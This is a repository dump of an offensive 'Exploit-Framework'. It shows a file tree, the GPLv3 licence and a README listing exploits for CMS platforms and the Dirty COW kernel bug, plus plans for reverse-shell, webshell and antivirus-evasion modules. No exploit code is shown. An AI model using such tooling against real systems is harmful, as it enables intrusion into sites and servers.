├── .gitignore ├── LICENSE ├── README.md ├── core ├── banner │ └── banner.py └── log │ ├── Log.py │ └── color.py ├── exploit ├── codiad │ ├── cve_2014_9581.py │ └── cve_2017_11366.py ├── dedecms │ └── dedecms_recommand_php_sql_injection.py ├── joomla │ └── cve_2015_8562.py ├── kernel │ └── cve_2016_5195.py ├── moadmin │ └── cve_2015_2208.py ├── opensns │ └── front_page_getshell.py ├── seacms │ ├── cve_2017_17561.py │ └── seacms_v628_rce.py ├── wordpress │ └── cve_2017_5487.py └── zblog │ └── zblog_authenticated_getshell.py └── framework.py /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | .history 3 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. 
Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. 
Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. 
Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. 
A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 
163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 
196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 
229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 
256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 
287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 
317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. 
If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 
386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 
421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. 
If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 
486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 
512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. 
If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 
578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 
613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 
651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 
675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Exploit-Framework 2 | [![Backers on Open Collective](https://opencollective.com/Exploit-Framework/backers/badge.svg)](#backers) 3 | [![Sponsors on Open Collective](https://opencollective.com/Exploit-Framework/sponsors/badge.svg)](#sponsors) 4 | #### Exploits: 5 | 6 | |Vendor|Vulnerability|Effected Version|Description|Author| 7 | |:-:|:-:|:-:|:-:|:-:| 8 | |[zblog](https://www.zblogcn.com/zblogphp/)|[NOT_CVE](https://gist.github.com/WangYihang/318020687b7e5f1efb38e9afd40c941b)|<=1.5.1|Zblog Authenticated LFI|[@Shutdown_r](http://www.jianshu.com/u/0876d51c215f)| 9 | |[OpenSNS](http://www.opensns.cn/)|[NOT_CVE](http://0day5.com/archives/4280/)|<=3.31|OpenSNS UnAuthenticated GetShell|[@90sec](https://forum.90sec.org/)| 10 | |[Joomla](https://www.joomla.org/)|[CVE-2015-8562](https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html)|1.5<3.45|Joomla Header Unauthenticated RCE|[@Andrew McNicol](https://github.com/anarcoder)| 11 | |[Codiad](https://github.com/Codiad/Codiad)|[CVE-2017-11366](https://nvd.nist.gov/vuln/detail/CVE-2017-11366)|<=2.8.3|Codiad Authenticated RCE|[@WangYihang](https://github.com/wangyihang)| 12 | |[Codiad](https://github.com/Codiad/Codiad)|[CVE-2014-9581](https://nvd.nist.gov/vuln/detail/CVE-2014-9581)|<=2.4.3|Codiad Authenticated LFI|[@TaurusOmar](https://www.exploit-db.com/author/?a=7716)| 13 | |[SeaCMS](http://www.seacms.net)|[CVE-2017-17561](https://nvd.nist.gov/vuln/detail/CVE-2017-17561)|<=6.56|SeaCMS Authenticated GetShell|[@WangYihang](https://github.com/wangyihang)| 14 | |[SeaCMS](http://www.seacms.net)|[NOT_CVE](http://0day5.com/archives/4180/)|<=6.28|SeaCMS UnAuthenticated RCE|[@没穿底裤](http://0day5.com/author/1/)| 15 | |[phpMoAdmin](http://www.phpmoadmin.com/)|[CVE-2015-2208](https://www.exploit-db.com/exploits/36251/)|<=1.1.2|phpMoAdmin 
UnAuthenticated RCE|Unknown| 16 | |[WordPress](https://wordpress.org/)|[CVE-2017-5487](https://www.exploit-db.com/exploits/41497/)|<4.7.1|WordPress Username Enumeration|[@Dctor](https://www.facebook.com/hatbashbr/)| 17 | |[DedeCMS](http://www.dedecms.com/)|[NOT_CVE](http://0day5.com/archives/1349/)|<=5.6|DedeCms recommend.php SQL injection|[@没穿底裤](http://0day5.com/author/1/)| 18 | |[Kernel](https://www.kernel.org/)|[CVE-2016-5195](https://dirtycow.ninja/)|2.6.22<3.9|DirtyC0w Privilege Escalation|[@nowsecure](https://github.com/nowsecure)| 19 | 20 | #### Video: 21 | [![asciicast](https://asciinema.org/a/152418.png)](https://asciinema.org/a/152418) 22 | 23 | #### WIKI: 24 | > https://github.com/WangYihang/Exploit-Framework/wiki 25 | 26 | #### Contribution: 27 | > [1. Guidance of writing exploit module](https://github.com/WangYihang/Exploit-Framework/wiki/Contributing-to-Exploit-Framework) 28 | 29 | #### TODO: 30 | - [ ] 解析字符串 31 | - [ ] 深层模块化 32 | - [ ] 上下文栈维护 33 | - [ ] 日志 34 | - [ ] 自动补全 35 | - [ ] Exploit 搜索 36 | - [ ] Wiki 37 | - [ ] Exploit 规范 38 | - [ ] 维护 Reverse Shell (结合 Reverse-Shell-Manager) 39 | - [ ] Payload 模块 40 | - [ ] 免杀模块 41 | - [ ] 维护一句话木马 (结合 Webshell-Sniper) 42 | - [ ] 数据库 43 | - [ ] Web 前端 44 | 45 | 46 | ## Contributors 47 | 48 | This project exists thanks to all the people who contribute. 49 | 50 | 51 | 52 | ## Backers 53 | 54 | Thank you to all our backers! 🙏 [[Become a backer](https://opencollective.com/Exploit-Framework#backer)] 55 | 56 | 57 | 58 | 